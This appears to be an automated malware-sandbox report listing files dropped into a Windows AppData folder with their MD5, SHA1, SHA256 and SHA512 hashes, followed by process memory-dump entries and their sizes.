Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
MD5
31611fc40493d80f33b3dd411aaa4026

SHA1
71004f5959cae1d17caf3604b703b04ea8862316

SHA256
12814babde304defc4acc2593618637b2f505e0b12798842ce2c6f2dc368450c

SHA512
f86e5b67f8e1c90f4c7da319c87759f15f6dc349b466b5b158a0ff5e28abe824423a2a917eb48826e22f2cf414b6d114d44bf96aa7786a7b0e28ccdcc672511e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
MD5
14a4954f51da5cf0d996b9a61dd4c0e5

SHA1
9418d49202324ba8477f5933b7d7480e507c49b9

SHA256
885272ff3bbe2f9503a92e3746d21e3ac78ea01a1e9ff890f750b182af23a5f0

SHA512
d4c2b5b4cdb096f8eeff30e0f53dc321273a196cfadedbf003d41c7fd330bee7290d2f262ed50b1d952136136154141c71169526f5ff46e17a32f9017bfdb5cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
66294a0b8c3ebd0377785a2e7fad8d9d

SHA1
36034abc756afd2d7b2c8e7c0d43f4a515ed3884

SHA256
1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

SHA512
8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
66294a0b8c3ebd0377785a2e7fad8d9d

SHA1
36034abc756afd2d7b2c8e7c0d43f4a515ed3884

SHA256
1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

SHA512
8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
MD5
04ed50252c84264e20272d8eecbb5dfe

SHA1
dd8513a583de10c6d69f731dafe47134367ba4b0

SHA256
d8408a8cc89f9dfef7c994a822409f6bcb2dc6d8fe9af0edeb81c5347411641c

SHA512
536d148dde8feac142ca3b4a316ec3ecd76038c19d346d67cba9ae193722cd5aad890004e80fb37a56f14ff6aba25fed0f15f3845e5ce7fdbdb36612690e5f71

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
MD5
b58884e0aed5e1591fa72febf6dc8d47

SHA1
853e404cad2e662604497d7313ca8aa36cf4e9e1

SHA256
a9f1b987d3b1fb46c6d9ede15027f23c822967b699ce20b01f077faf6fa3e5d4

SHA512
20177c63929049ca80e8e7730858b7f33f3ee3fb76014e5e0c66ccc318747c1f434f77e1811775e13bd8d26e1a847a85cc7b09dce471525ab882da543a9dfe5c

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
66294a0b8c3ebd0377785a2e7fad8d9d

SHA1
36034abc756afd2d7b2c8e7c0d43f4a515ed3884

SHA256
1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

SHA512
8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
66294a0b8c3ebd0377785a2e7fad8d9d

SHA1
36034abc756afd2d7b2c8e7c0d43f4a515ed3884

SHA256
1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

SHA512
8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

Download Submit
memory/1624-99-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-95-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-103-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-102-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-109-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-105-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-104-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-106-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-107-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-108-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-101-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-100-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-90-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-83-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-82-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-84-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-98-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-97-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-96-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1624-85-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1712-80-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-79-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-94-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-92-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-87-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-88-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-91-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-89-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-65-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-69-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-70-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-93-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-78-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-77-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-76-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-75-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-74-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-73-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-72-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-71-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-68-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-67-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1712-66-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/1792-54-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

Filesize
8KB

Download